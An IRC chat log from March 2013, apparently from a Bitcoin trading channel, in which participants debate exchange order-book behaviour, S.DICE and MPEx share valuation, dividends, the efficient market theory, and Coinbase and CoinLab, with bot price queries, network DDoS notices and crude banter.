negative. Sent ratings: 62 positive, 13 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=mircea_popescu Mar 25 01:44:24 nice rating Mar 25 01:44:31 ;;getrating Josh_Rossi Mar 25 01:44:31 WARNING: Currently not authenticated. User Josh_Rossi, rated since Sat Mar 9 16:02:17 2013. Cumulative rating 1, from 1 total ratings. Received ratings: 1 positive, 0 negative. Sent ratings: 0 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Josh_Rossi Mar 25 01:45:30 thats better... Mar 25 01:45:54 mircea_popescu: deposits, please? Mar 25 01:46:46 bitfloor last is 73.50 Mar 25 01:47:07 once its up around $100 i can't wait to just trade for fun Mar 25 01:47:11 jurov thy wish is my command. Mar 25 01:47:17 rebate is really nice at that price Mar 25 01:50:12 thx Mar 25 01:52:55 smickles my npd goes as such : yest told waitress she has a beautiful smile and it's a pleasure to talk to her which made her smile compulsively like an idiot every time she saw me and then gave her a nice tip. today cooked pasta and had jasmine tea (4 cups). so you tell me. Mar 25 01:53:03 and also jasmine tea is the best tea there is. Mar 25 01:53:45 also this chatlog is a riot lol. clockbluffers. Mar 25 01:54:00 did you watch the tiberiusiv section? Mar 25 01:54:50 im reading through iot Mar 25 01:55:00 where it=log Mar 25 01:55:39 it tends to repeat itself as tiberiusiv keeps circling back to his old flawed points Mar 25 01:56:10 smickles really cut the argument down to its core though, so good job to him Mar 25 01:56:53 tiberisuiv is a little puppy, very excited about all these new ideas bitcoin has put in his head. Mar 25 01:56:59 wait till mircea comes to what tibby thinks about his sdice opinion Mar 25 01:57:14 i know yeah Mar 25 01:57:36 for the record tho : the dividend-based corp valuation model is flawed. Mar 25 01:57:44 i understand the value of dividends in decreasing risk Mar 25 01:57:56 however, plenty of irl companies pay no dividends. hathaway paid no dividends. Mar 25 01:58:03 or whatever, paid 1 cent once in 197x Mar 25 01:58:10 mircea_popescu: that was kakobrekla's point of view Mar 25 01:58:15 I like monkey paw green tea Mar 25 01:58:19 and YES, buffett COULD wire himself all their capital in uganda and run off. Mar 25 01:58:25 AAPL being the best example Mar 25 01:58:48 did not pay any dividends in steve jobs era IIRC Mar 25 01:58:54 dividends make sense if you have a strong income flow but not a good plan for applying that capital to company growth Mar 25 01:59:00 i was a bit of a troll at some points MJR_III ;) Mar 25 01:59:24 smickles: it was in that sense anti-troll Mar 25 01:59:39 Bugpowder exactly. which is why i see why the cavirtex ppl wouldn't really want to pay dividends. Mar 25 01:59:39 because saying evoorhees runs sdice and bitinstant is patently false Mar 25 01:59:48 i don't think that necessarily speaks against them Mar 25 02:00:00 MJR_III iirc evoorhees was pr for bitinstant ? Mar 25 02:00:04 im pretty sure shrem runs it Mar 25 02:00:09 mircea_popescu: i agree...but i don't like having to sell a position to take profits Mar 25 02:00:21 MJR_III that's also a point, yeah. Mar 25 02:00:25 if i believe in the company i'd rather just buy and hold...but sometimes you need to take some profits to rebalance Mar 25 02:00:37 well... here's the other side of that coin : Mar 25 02:00:41 fuck balance, buy calls Mar 25 02:00:47 :-P Mar 25 02:00:48 the fact that stocks work as bonds (ie, they issue dividends) Mar 25 02:00:52 makes the markets very illiquid Mar 25 02:00:58 good point Mar 25 02:01:01 or moreover, fractured : the big time holders who don't participate in price formation Mar 25 02:01:06 i am in that boat now with sdice Mar 25 02:01:13 and the 1-10 btc holders who move the price 30 to 70 to 30 to 70 Mar 25 02:01:22 creating a general; impression of disorder Mar 25 02:01:30 that is my biggest problem Mar 25 02:01:33 yeah. Mar 25 02:01:36 it fucks up my performance sheets Mar 25 02:01:42 and for no real reason Mar 25 02:01:49 since volume is very low and spreads are wide Mar 25 02:01:58 so in a very macro sense you are better off as a portofolio investor with the "have to sell ot realise" paradigm, as inconvenient as it is Mar 25 02:02:02 because the alternative sucks more. Mar 25 02:02:10 but again...valuation is the key, that is basically what caused 2008 crises Mar 25 02:02:36 people not knowing what shit was worth Mar 25 02:02:38 course corps like s.dice have no choice in the matter, as there's no practical way to deploy. Mar 25 02:02:46 but corps that have the choice... Mar 25 02:02:52 -kloeri- [Global Notice] Hi all. We're currently having some network connectivity issues as you're most likely aware. We're looking into the issue and hope to be back to normal soon. Thanks for using freenode. Mar 25 02:02:58 i was watching rogue trader today...they sold nick leesons trading floor jacket for 21,000 lb Mar 25 02:03:04 sold barings for 1 lb Mar 25 02:03:19 they should have sold his jacket for shares Mar 25 02:03:24 hehehe Mar 25 02:03:24 not for fiat Mar 25 02:03:41 actually they should have claimed that it was a liquidable asset Mar 25 02:04:01 and ING should have gotten it Mar 25 02:04:12 i'm about to watch margin call...but that very word makes me feel ill Mar 25 02:04:24 which is why i like bitcoin trading...i don't have margin calls to worry about Mar 25 02:04:37 lol @ "unless there is legislation STOPPING you it is implicityly legal" "WRONG" part Mar 25 02:04:40 tiberiusiv who told you this ? Mar 25 02:05:02 you will lol quite a bit Mar 25 02:05:08 it gets worse from there Mar 25 02:05:36 but anyway, i don't get his numbers. Mar 25 02:05:36 this is completely ignoring the matter of jurisdiction of said legislation Mar 25 02:05:41 ;;bids 0 Mar 25 02:05:41 There are currently 40223789 bitcoins demanded at or over 0.0 USD, worth 7129667.659 USD in total. | Data vintage: 97.4144 seconds Mar 25 02:05:54 s.dice paid ~70k btc in a year and the average mkt cap past month is 500k Mar 25 02:05:56 what 30% ? Mar 25 02:05:56 nice... Up from $6.2MM Mar 25 02:06:16 Bugpowder kinda meaningless figure tho innit. Mar 25 02:06:23 not totally Mar 25 02:06:38 the is the lower bound of cash on hand at mtgox Mar 25 02:06:38 in some ways it makes more sense to think of SDICE as a private equity stake Mar 25 02:06:47 it is just getting started i feel Mar 25 02:06:53 100 dollars deposited allows you an order of 10bn btc at 0.00000001 eacgh Mar 25 02:06:56 more useful would be total current deposts. Mar 25 02:07:08 yes. Mar 25 02:07:14 mircea_popescu: I am not interested in the BTC number, just the USD total Mar 25 02:07:16 but they can't publish that as it'd tell a real sad story. Mar 25 02:07:30 asks IS worthless Mar 25 02:07:31 oh i see, i misread. yeah. Mar 25 02:07:34 did you see the number of tickets available? Mar 25 02:07:38 yeah, that is something. Mar 25 02:07:41 yes Mar 25 02:07:55 not available actually but in queue Mar 25 02:08:14 fucked up how much noise to signal there is from the biggest exchange Mar 25 02:08:41 "mjr: if satoshidice future was more certain, the price would reflect it, it doesnt." << well, this is fundamentally a broken argument. Mar 25 02:08:53 a restatement of the efficient market theory, which is broken even in fiat. Mar 25 02:09:05 yep Mar 25 02:09:10 he is a HUGE proponent of efficient market Mar 25 02:09:18 Bugpowder: it's not cash on hand at gox Mar 25 02:09:20 as you'll see...i told him if market was efficient it'd be broken Mar 25 02:09:24 no trading ever Mar 25 02:09:41 gox lets you place bids b/f you have cash in the account Mar 25 02:09:41 they show in the book and only disappear when they get touched by an ask Mar 25 02:09:43 perfect illiquidity Mar 25 02:10:41 smickles what ?! Mar 25 02:10:47 they have the phantom liquidity model too now ?! Mar 25 02:10:57 no Mar 25 02:10:58 wtf is it about bad ideas that makes them so irresistible to people. Mar 25 02:10:59 isn't dice price a reflection of random market killing acts by its issuer? Mar 25 02:11:00 they don't Mar 25 02:11:05 smickles is wrong Mar 25 02:11:08 dub possibly. Mar 25 02:11:09 Bugpowder proved that last night Mar 25 02:11:23 dub: lol Mar 25 02:11:25 Bugpowder don't they ? Mar 25 02:11:29 I tested it. Mar 25 02:11:36 a ok. was about to blow up over here Mar 25 02:11:45 the other orders only pop up when that one is canceled Mar 25 02:12:13 If you underfund your bids, your cheapest bids don't post to the market Mar 25 02:12:17 so basically you can put it in, but it won't list it in the book ? Mar 25 02:12:20 i think bugpowder said that they only show the closest to top of book? Mar 25 02:12:24 right Mar 25 02:12:31 pretty clever way to do it. Mar 25 02:12:41 kills both cats. Mar 25 02:12:43 what about both sides of book Bugpowder? Mar 25 02:12:57 for a market maker? Mar 25 02:13:08 Don't have coin at mtgox right now, but pretty sure you need to fund asks too for them to show Mar 25 02:13:37 I can test in a few days when I dump another batch at $97. :) Mar 25 02:13:58 well that theory was busted for me...i guess their book is pretty accurate, as far as they actually have funds behind orders Mar 25 02:14:35 right, but what we REALLY want to know is the shadow pool of funds not on the book. Mar 25 02:14:59 'tis true m'lrd Mar 25 02:14:59 it's why people say X wall is fake Mar 25 02:15:00 ;;latency Mar 25 02:15:04 0.25 seconds. Mar 25 02:15:13 been a trading movie kind of day Mar 25 02:15:17 people say X wall is fake because they are fucking idiots. Mar 25 02:15:24 glengarry glen ross and rogue trader...now margin call Mar 25 02:15:32 well... Mar 25 02:15:32 glengarry glen ross kicked ass. Mar 25 02:15:37 hehehe Mar 25 02:15:39 yeah Mar 25 02:15:42 coffee is for closers Mar 25 02:15:44 ;;google trilema glengarry glen ross Mar 25 02:15:47 Sa invatam Texas Hold'em impreuna, teoria cartilor pe Trilema - Un ...: ; Lewis - Wikipedia, the free encyclopedia: Mar 25 02:15:55 dude google is so borkt. Mar 25 02:16:15 lol Mar 25 02:16:16 http://www.youtube.com/watch?v=8kZg_ALxEz0 Mar 25 02:16:21 I was trying to think of a way that gox can be gamed through its shithouse engine Mar 25 02:16:34 spammy orders Mar 25 02:16:36 you could basically stop trading with a handfull of accounts Mar 25 02:16:38 third prize is... your fired! Mar 25 02:16:40 doubt they have toxic flow preventers Mar 25 02:17:02 you could use the api to send many orders at tiny amounts Mar 25 02:17:05 their minimum Mar 25 02:17:11 filling their queues Mar 25 02:17:21 if you could work out how to reliably control timing.. Mar 25 02:17:26 to some extent bots already do that Mar 25 02:17:27 it is almost certain that they are doing reads on an HDD Mar 25 02:17:40 well bots do it intentionally to try to place orders Mar 25 02:17:42 I would imagine they are using SSDs. Mar 25 02:17:44 you could do it far outside the money Mar 25 02:17:52 you wo9uld imagine wrong i think Mar 25 02:17:57 and that the whole book is kept in RAM Mar 25 02:17:58 2 minutes lag with an ssd? Mar 25 02:18:06 lol, i wish Mar 25 02:18:11 no way its that slow if that were the case Mar 25 02:18:29 DB programming is one of the biggest areas where this space needs help Mar 25 02:18:29 They are not hitting the disk. Mar 25 02:18:35 you are sure? Mar 25 02:18:39 nope Mar 25 02:18:50 But the book isn't very big Mar 25 02:18:50 how could they be so slow in RAM Mar 25 02:19:01 even more reason they can't have it in ram Mar 25 02:19:02 MJR_III because they run a webserver on the same machine Mar 25 02:19:13 and when apache gets flooded it slows down Mar 25 02:19:32 they list "improving the matching engine is one of our biggest projects right now" Mar 25 02:19:48 apache is not the matching engine...though that very may well exacerbate the problem Mar 25 02:20:10 they're prolly going to move it on a separate machine seeing how i the "how mpex does it" article made the rounds Mar 25 02:20:15 which thanks god already. Mar 25 02:20:27 MJR_III apache slows down the entire machine. Mar 25 02:20:45 ah could be true i suppose Mar 25 02:20:54 not a big fan of apache...its ok Mar 25 02:21:01 nor am i a fan of php Mar 25 02:21:17 they should have gone nodejs, nginx, and mongodb Mar 25 02:21:26 < Bugpowder> smickles is wrong << i guess they finally gave that up, huh? (also, i'm laggin out like mad cats) Mar 25 02:21:28 but mostly for the cool factor Mar 25 02:24:15 well... most webservers come prioritised out of the box Mar 25 02:24:25 smicklescorp under ddos? Mar 25 02:25:34 "Most open tickets have a resolution within 20 minutes. Remaining cases are when there is not enough information, or when issues are not simple user-specific issues (or linked to an outage)." Mar 25 02:25:38 sez tux. Mar 25 02:26:37 dub: yeah, by the damn baidu bot Mar 25 02:26:51 it hits me about 12 times a day Mar 25 02:28:14 btw... mircea_popescu did you see the Private Equity deal for CoinBase? Mar 25 02:28:17 mircea_popescu: They raised my withdrawl limit two hours after I emailed them Mar 25 02:28:46 interesting, bitcoin-central does accept unfunded asks too, but shows them in book with zero amount Mar 25 02:29:39 MJR_III i have nod. Mar 25 02:29:43 Bugpowder that's cool. Mar 25 02:30:06 as far as i know you're the only person with a positive experience with them. Mar 25 02:30:11 yah, I was afraid it would be a PITA and I'd be behind 5500 accounts waiting verification Mar 25 02:30:12 not discounting it, but it IS exceptional. Mar 25 02:30:34 I was already verified so it must have been easy Mar 25 02:31:09 so many reddit posts about how hard it is to buy bitcoins Mar 25 02:31:23 lol, i am loving bitfinex Mar 25 02:31:40 put $170 in on the 19th...$175 today... Mar 25 02:32:02 crazy to see compound interest at work...usually its fractions of pennies Mar 25 02:33:01 its really a system of haves and have nots. People with verified gox accounts that aren't scared by filling out a wire form or put off by paying a $30 fee, or have a bitcoins direct account... Those are the haves. Then there are the people that use coinbase or are sitting in the verification queue. Mar 25 02:33:25 jurov: i updated to use the new data.mtgox Mar 25 02:33:58 Bitcoin is just such a stunning example of how profitable it can be to be an early adopter of something, on some many levels. Mar 25 02:34:06 so many Mar 25 02:34:58 can i resell my verified acct somehow? Mar 25 02:35:46 or would it be suspicious that guy from yurp suddenly gets bunch of ach,dwolla and such stuff? Mar 25 02:37:25 Bugpowder then there's the people with 50k waiting for 3 months for the "developers" to look into it Mar 25 02:37:26 http://blog.smickles.com/wp-content/uploads/sites/3/2013/03/scary-batman-double-top.jpg Mar 25 02:37:59 mircea_popescu: Did they wire in over $10k at a time? Mar 25 02:38:08 let's finish the drawin together Mar 25 02:38:24 Bugpowder long time user guy, im sure he didn't step into anything obvious. Mar 25 02:39:21 sux. that's like 0.65 Teslas. Mar 25 02:40:00 "MagicalTux already explained that he is writing a entirely new site that is decent and not a stupid magic the gathering trading script. " Mar 25 02:40:06 https://bitcointalk.org/index.php?topic=20572.msg263943#msg263943 Mar 25 02:40:08 june 2011. Mar 25 02:43:36 So... On wednesday, thursday and friday of last week, 10,000-20,000 BTC buys went off between 15:00-15:30 GMT each day. So, we may be thru $75 within the next 15 hours. Mar 25 02:47:09 ;;market buy 20000 Mar 25 02:47:12 A market order to buy 20000 bitcoins right now would take 1477023.0224 USD and would take the last price up to 75.1364 USD, resulting in an average price of 73.8512 USD/BTC. | Data vintage: 0.0011 seconds Mar 25 02:48:35 correction TuesWedsThurs Mar 25 02:48:46 mircea_popescu: did you see the car i want to get once bitcoins make it possible lol Mar 25 02:49:20 http://www.youtube.com/watch?v=Z39jXZfCpf0 Mar 25 02:49:25 such a beast Mar 25 02:49:34 its nice to dream Mar 25 02:49:43 but anyways...this PE deal could be good i think Mar 25 02:50:07 https://bitcointalk.org/index.php?topic=157789.msg1669605#msg1669605 Mar 25 02:50:17 could probably use some activist investors lol Mar 25 02:50:25 fix whatever stupid model they are using Mar 25 02:51:03 what's with everyonebuying cars already Mar 25 02:51:03 I was gonna dismiss that based on its european decent but its actually pretty badass Mar 25 02:52:46 "Hey All I Am a long time miner with a low budget. My 1 Gh/s isnt cutting it anymore, or has it for a long time. I need our Help to Secure a Batch #3 Avalon. I Have A Listing Up On BTCJam" Mar 25 02:52:49 gotta love these. Mar 25 02:53:01 i haven't gotten one yet Mar 25 02:53:10 but maybe at $1000 per btc Mar 25 02:53:38 basically military model Mar 25 02:53:56 250 btc then i think... Mar 25 02:55:14 but that was not the cool link...what would you price that block of coinbase shares at? Mar 25 02:56:29 i don't see that coinbase is worth money. Mar 25 02:56:35 i would sell. Mar 25 02:56:42 well... Mar 25 02:56:51 while i agree coinbase is fucking up their opportunity Mar 25 02:56:56 that just changes the price Mar 25 02:57:01 they have users Mar 25 02:57:04 and could turn around Mar 25 02:57:12 in fact, i think that is not a good sign for them Mar 25 02:57:13 sure. Mar 25 02:57:21 looking for liquidity options ON A FORUM Mar 25 02:57:22 but you asked me. Mar 25 02:57:25 not second market Mar 25 02:57:42 not an otc thing, or not another internal investor Mar 25 02:58:21 if voorhees has 90% of sdice shares, what stops him from playing on his own site everytime he wants to dump more shares, in order to increase "profits" thereby introducing more motivated bidders to buy them Mar 25 02:58:26 mircea_popescu: A car is a functional object of desire that feels like it just might actually be in reach, even if you have only a few hundred coins. Mar 25 02:58:35 tiberiusiv: ffs Mar 25 02:58:51 read the trilemna Mar 25 02:59:07 tiberiusiv this is a recurring topic, http://trilema.com/2013/the-question-of-the-year-in-btc/ Mar 25 02:59:11 there's even a bounty out. Mar 25 02:59:20 http://trilema.com/2013/the-question-of-the-year-in-btc/ Mar 25 02:59:21 thnx Mar 25 02:59:28 ya Mar 25 02:59:34 it is an interesting idea though Mar 25 02:59:41 (87%) now Mar 25 03:00:12 minus the mystery investors shares Mar 25 03:01:11 if sdice had that level of profits why is mpex worth more then sdice? Mar 25 03:02:19 omg i beat Bugpowder tyo the links once Mar 25 03:02:35 tiberiusiv also an amply discussed topic. Mar 25 03:02:38 we need a FAQ for bitcoin-asstes Mar 25 03:02:42 lol Mar 25 03:02:59 the article doesnt answer the question Mar 25 03:03:03 simply you cant prove it Mar 25 03:03:09 something like "read http://trilema.com/category/mpex/ and then http://trilema.com/category/bitcoin/". when you're done you can't look like a fool anymore. Mar 25 03:03:28 tiberiusiv any field of human activity will have open questions. Mar 25 03:03:53 ever watch boiler room. Mar 25 03:03:59 yes Mar 25 03:04:23 i haven't. is it worth it ? Mar 25 03:04:27 bitcoin enables you to run boiler room scams all day long Mar 25 03:04:47 Also known as the bitcointalk forum Mar 25 03:04:53 mircea: its more entertainment then anything Mar 25 03:05:11 yeah its a pretty decent movie Mar 25 03:05:45 mkay, was looking for something. Mar 25 03:06:09 I cannot freaking wait to see the MPOE results for this month Mar 25 03:06:27 I suspect a disaster is brewing for the bondholders Mar 25 03:06:46 well why cant mpex do the same thing? Mar 25 03:07:11 create bids to sell the 1bil shares too Mar 25 03:07:32 I assume this is what mircea_popescu is doing. Why else would S.MPOE be worth so much? Mar 25 03:07:39 lol Mar 25 03:07:47 mircea IS the market Mar 25 03:07:52 well...think about this Mar 25 03:07:54 Not really though Mar 25 03:08:10 People have deposited a LOT of coins into the recieving address Mar 25 03:08:12 investing in a company that loses value in bitcoin (as long as its not too fast) just slows your rate of gain for now Mar 25 03:08:13 dude, i have no idea. there's an old article discussing this, i'm no better. Mar 25 03:08:26 one idea may be that s.mpoe shareholders can never make a loss. Mar 25 03:08:27 the coins need to go into some security Mar 25 03:08:29 s.dice can. Mar 25 03:08:49 bugpowder: you can send coins to yourself. Mar 25 03:08:55 i have always wondered why you put bondholders before shareholders Mar 25 03:09:03 which is fine, but just opposite Mar 25 03:09:06 um every business does that Mar 25 03:09:12 huh? Mar 25 03:09:20 bondholders come before shareholders. Mar 25 03:09:23 even in bankruptcy Mar 25 03:09:32 to get PAID Mar 25 03:09:36 not to take losses Mar 25 03:09:51 what losses are the bondholders taking? he didnt default Mar 25 03:10:00 read the faq please Mar 25 03:10:06 i'll paste it, but srsly Mar 25 03:10:42 there are many financial instruments that are concievable Mar 25 03:10:48 he probably placed bondholders before shareholders since hes the largest shareholder Mar 25 03:10:52 ... Mar 25 03:10:54 one should read the contract, not the name. Mar 25 03:11:00 tiberiusiv srsly, read stuff. it's fun to read. Mar 25 03:11:21 i did read your post, there was no answer about mr voorhees Mar 25 03:11:27 fact is nobody knows. Mar 25 03:11:31 you are nao discussing a different topic tho Mar 25 03:11:32 tiberiusiv: correct Mar 25 03:11:39 which is also documented at length Mar 25 03:11:56 voorhees has massive incentive to manipulate sdice and get rich dumping stock Mar 25 03:12:11 nobody knows, and everyone knows nobody knows except those that do not yet know that everyone knows that nobody knows. Mar 25 03:12:16 haha Mar 25 03:12:17 you can easily put together $5-10mil Mar 25 03:12:18 but now you know Mar 25 03:12:27 and knowing is half the battle Mar 25 03:12:28 lol bugpowder Mar 25 03:12:46 how much is a 2 carat, sdlightly yellow, princess cut no impurities diamond worth ? Mar 25 03:13:07 what do you mean by slightly yellow? Mar 25 03:13:12 (k)In the case where MPOE, after having paid the interest as detailed above as well as all costs and fees resulting from contracts purchases and executions will be found to have a shortfall, that shortfall will be applied to the capital of the bonds deposited that were accepted proportionally, so that each bond is reduced by the same ratio as the ratio between the shortfall and the Mar 25 03:13:14 calculated capital reserves requirement. Bonds that were not accepted as well as the unaccepted parts of partially accepted bonds are extempt from this reduction. Mar 25 03:13:16 $12k Mar 25 03:13:25 Bugpowder HA! Mar 25 03:13:30 assuming its a J color, and lets say SI2 Mar 25 03:13:34 diamonds are not scarce and debeers is just manipulating the price. Mar 25 03:13:47 yes I know that you know that Mar 25 03:13:48 it's worth $45 Mar 25 03:13:51 lalala Mar 25 03:14:14 are you using a cost based pricing model instead of a price based costing model? Mar 25 03:14:22 hehe Mar 25 03:14:32 just showing that speculative thought is not always economically relevant. Mar 25 03:14:50 as enjoyable the indulging of it may be. Mar 25 03:14:55 if the diamond cost $45 to dig out, you need to spend $2000 in ads to make it worth $12000 Mar 25 03:15:08 o, we're not considering the cost to dig it out Mar 25 03:15:13 cartel is pretty much broken now right? Mar 25 03:15:17 we're armchair economists, so we get to pick our cost model. Mar 25 03:15:18 i guess the overall point to take away is invest what you want and get the returns you can...try to learn the risks, but you will NEVER have a risk free investment and you will never have perfect information Mar 25 03:15:23 why haven't prices dropped? Mar 25 03:15:24 we'll use a copper mining model for diamons. Mar 25 03:15:55 Bugpowder actually... the russians found something like three tons under a lake. Mar 25 03:16:02 and i mean that, like 54734897598347985739847 carats Mar 25 03:16:22 MJR_III: yeah, to the point of tiberiusiv, this is just one more datapoint for the risk matrix. Get more datapoints and connect the dots better then everyone else and you will make money in this bitcoin shit. Mar 25 03:16:32 just like irl, Mar 25 03:16:35 but with bits Mar 25 03:17:06 yep Mar 25 03:17:11 efficient market is bullshit Mar 25 03:17:14 you get what you can Mar 25 03:17:26 try to know a little more than the next guy Mar 25 03:17:33 anyway, the "it's all just one great conspiracy" argument is never disprovable. Mar 25 03:17:42 hehehe...what if aliens Mar 25 03:17:43 at the end of the day, major players hold substantial bitcoins and need bids to dump them. bitcoin has worse wealth distribution then even fiat currency by a massive margin Mar 25 03:17:45 it carries a little more apparent water in btc than irl because there's fewer people in btc Mar 25 03:17:52 mircea_popescu: and with competition that is significantly underpowered relative to irl finance. Mar 25 03:17:55 but then again, we KNEW there's fewer people in btc at the onset. Mar 25 03:18:12 tiberiusiv how do you know this ? Mar 25 03:18:31 just add up even the top 500 adresss which probably belong to 50 people. Mar 25 03:18:34 yeah, I actually doubt tiberiusiv statement is true Mar 25 03:18:35 ... Mar 25 03:18:43 so what, add up some fact with some assumption ? Mar 25 03:18:52 why haven't i thought about that! you mean this can prove ANYTHING ? Mar 25 03:18:52 wow. Mar 25 03:19:08 add up the top 50 people IRL net worth Mar 25 03:19:14 Bugpowder i have no way of knowing. i'm one of the major holders and my addies aren't on the list. Mar 25 03:19:15 what nao Mar 25 03:19:29 bugpowder: none of the top 50 hold even 1% of oustanding dollars. Mar 25 03:19:35 O? Mar 25 03:19:54 trivial to hold 1mn btc in 100k 10 btc addies. Mar 25 03:19:59 and arguably much better safety too Mar 25 03:20:02 yes exactly Mar 25 03:20:05 (admitting someone cracks an address) Mar 25 03:20:09 Who owns Aramco Mar 25 03:20:12 the top 500 adress's probably belong to 50 people Mar 25 03:20:31 that doesnt even count the spread out individuals Mar 25 03:20:35 ? Mar 25 03:20:38 is this where someone whips out a "the richest 50 famblies own 547834987593485 dollars" ? Mar 25 03:20:54 the richest families dont own the money. Mar 25 03:21:11 they own illiquid assets they can never sell Mar 25 03:21:15 o ic. Mar 25 03:21:19 this because fiat is broken Mar 25 03:21:27 dont thinks big holder keep in big wallet, u made 100 address in a second Mar 25 03:21:28 btc not being broken... we focus on that. Mar 25 03:21:33 Think big, think positive, never show any sign of weakness. Always go for the throat. Buy low, sell high. Fear? That's the other guy's problem. Nothing you have ever experienced will prepare you for the absolute carnage you are about to witness. Super Bowl, World Series - they don't know what pressure is. In this building, it's either kill or be killed. You make no friends in the pits Mar 25 03:21:35 and you take no prisoners. One minute you're up half a million in soybeans and the next, boom, your kids don't go to college and they've repossessed your Bentley. Are you with me? Mar 25 03:21:45 lol Mar 25 03:21:54 such bs. Mar 25 03:21:59 yea MJR im sure your selling low and high with your 25 btc's Mar 25 03:22:08 you a player Mar 25 03:22:10 why ? chix in the pits are some of the hottest sackpanthers you'll ever befriend Mar 25 03:24:27 tiberiusiv: if you a baller why not flash some addresses up here Mar 25 03:24:45 channels logged. Mar 25 03:24:56 so what? Mar 25 03:25:01 lol. let the kid be. Mar 25 03:25:04 make the cash without the flash Mar 25 03:25:07 what evidence do we have that you are a baller Mar 25 03:25:09 he's taking the boy approach to learning, challenging stuff. Mar 25 03:25:23 you could just be pretending... Mar 25 03:25:26 learning what? so far what ive seen in here is massive misunderstandings of markets Mar 25 03:25:43 yeah, that. Mar 25 03:25:53 no understanding of liquidty, bid/asks spreads. confusion over the fact that a tiny group of bitcoiners has massive price influence. Mar 25 03:26:13 -kloeri- [Global Notice] Hi again. The network issues is caused by a DDoS attack and we're working with our sponsors to have it filtered. Depending on how bored the attacker is it could be a while before everything is back to normal however. Sorry about the stability issues caused by this. Mar 25 03:26:18 that too Mar 25 03:26:18 the major holders are all to happy to get coinlab to accept wallstreet bids. Mar 25 03:26:31 why wouldn't we be? Mar 25 03:26:34 since they need HUGE bids to be able to effectively cashout Mar 25 03:26:42 bugpowder sush you are small time Mar 25 03:26:47 i wonder if annoyed ddos person manages to take off freenode Mar 25 03:26:51 you were crying over $4k lost in papergains Mar 25 03:26:58 ?? Mar 25 03:27:11 show me the log Mar 25 03:27:12 anyone wanna bet on that ? Mar 25 03:27:36 I cry over ever missed bit cent. Mar 25 03:27:42 tiberiusiv: it was a quote from trading spaces btw Mar 25 03:28:00 tiberiusiv: you usually sound like a person who has no real experience beyond a textbook Mar 25 03:28:20 anyone who believes in the efficient market theorem sounds like a freshman economics major Mar 25 03:31:08 tiberiusiv: here is why we wouldn't be... Coinlab is more likely to get hacked than to get wall street bids. Mar 25 03:31:30 actually the more amusing part is this "coinlab wallstreet" business. Mar 25 03:31:40 hot damn! Mar 25 03:31:46 this guy keeps being a half second ahead of me. Mar 25 03:31:57 that's why I'm making money off you Mar 25 03:32:06 haha i see Mar 25 03:32:10 or at least off your bondholders Mar 25 03:32:21 you have cleverly firewalled the risk Mar 25 03:32:27 well coinlab does seem like a joke Mar 25 03:32:52 top 26 BTC adress's are about 10% of all BTC outstanding lol Mar 25 03:32:56 do you mean coinbase or coinlab ? Mar 25 03:33:02 both Mar 25 03:33:23 coinlab is a joke (for now), coinbase is a clusterfuck Mar 25 03:33:41 when does coinlab officially open Mar 25 03:33:46 coinlab does have the potential to become even more of a clusterfuck than coinbase Mar 25 03:34:12 tiberiusiv: nobody knows. They moved thier alpha date to 'real soon now' 2 weeks after they said it was opening. Mar 25 03:34:28 i would argue against such potential. Mar 25 03:34:38 heh Mar 25 03:34:46 not because of them, obviously. Mar 25 03:35:23 $mpexlag Mar 25 03:35:24 mircea_popescu: 0.143377065659 seconds Mar 25 03:35:28 heh. Mar 25 03:35:28 their 'partnership' with gox immediately raises thier potential beyond anything coinbase can fuck up Mar 25 03:35:36 i am getting 6gbit for the record. Mar 25 03:35:41 FUCK YOU MR DDOS MAN :D Mar 25 03:35:42 mwahaha Mar 25 03:36:26 weaksauce Mar 25 03:36:32 lol nice job mircea_popescu Mar 25 03:36:45 everyone's like... snickering and shit. Mar 25 03:36:52 there's a lot of fun can be had with computers srsly. Mar 25 03:36:56 fucking testament to the strength of bitcoin as an IDEA that it survives the shitty management that people throw at it Mar 25 03:37:11 haha now that's a point Mar 25 03:37:19 and i am not talking even about EXECUTING WELL Mar 25 03:37:26 i am just talking about TALKING WELL Mar 25 03:37:34 managing expectations Mar 25 03:37:39 MJR_III you're new, do you know the genjix speech ? Mar 25 03:37:47 no Mar 25 03:37:49 o boy. Mar 25 03:37:57 and i am mjr_ so somewhat new Mar 25 03:38:06 but we've talked before Mar 25 03:38:08 http://trilema.com/2012/amir-taaki-has-done-and-continues-to-do-huge-disservice-to-anyone-serious-involved-in-bitcoin/ Mar 25 03:38:17 there. talkingwell. Mar 25 03:39:36 fuck...not sure where i left that cookie lol Mar 25 03:39:59 lol so make another one Mar 25 03:40:05 someone should start pastebinning these posts Mar 25 03:40:16 cut off mircea_popescu's revenue stream Mar 25 03:40:16 fu commie Mar 25 03:40:27 S.MPOEs bid support collapses Mar 25 03:40:32 lol Mar 25 03:40:34 MPEx folds Mar 25 03:40:39 i built it all on 0.1 cent article reads! Mar 25 03:40:41 bitcoin drops to 0.01 Mar 25 03:40:44 i was gonna ask how much actual revenue Mar 25 03:40:48 ;;google anonymizer Mar 25 03:40:48 could he possibly get Mar 25 03:40:49 Anonymizer - Online Privacy, Security, and Anonymous Surfing ...: ; Anonymizer - Wikipedia, the free encyclopedia: ; anonymizer.nntime.com home page: Mar 25 03:41:19 UNTOLD FORTUNES Mar 25 03:41:21 priced so cheap that the time it took to set up was more than the cost Mar 25 03:41:33 and now i'm doubling that cost i suppose Mar 25 03:41:37 anyway its probably not worth reading Mar 25 03:41:50 lol, i gotta say the content is worth the price Mar 25 03:41:51 in that if you don't already know what a fuckup amir is, you don't really want to Mar 25 03:42:00 its hard to look at Mar 25 03:42:02 hahaha Mar 25 03:42:18 dub baby, he was A DEVTEAM GUY this time last year,. Mar 25 03:42:26 you're aware yes ? painfully aware yes ? Mar 25 03:43:11 yes I am pained by his continued existence Mar 25 03:43:31 "Taaki is a speaker of Esperanto" srsly? Mar 25 03:43:54 so he can talk to the other five guys? Mar 25 03:44:05 i think vrag is one of the other five Mar 25 03:44:17 lol, anyway...he is a fuckup, he was behind intersango Mar 25 03:44:24 o, no. Mar 25 03:44:37 hes' the guy who "opensourced" the bitcoinica code, so abominations like bitfinex could spring up Mar 25 03:44:46 except he opensourced it with sensitive passwords in the codebase Mar 25 03:44:49 which resulted in a "heist" Mar 25 03:44:59 we haven't heard from Amir in a little while (afaik), I had hoped that his mother stopped suckling and he starved to death Mar 25 03:45:25 USD11.90000 last intersango usd trade Mar 25 03:45:27 buy buy buy Mar 25 03:45:27 anyway, boiler room is downloaded and my toes are being suckled on so i shall bid you all a very fine evening and be back later. Mar 25 03:45:37 let me know if you like it Mar 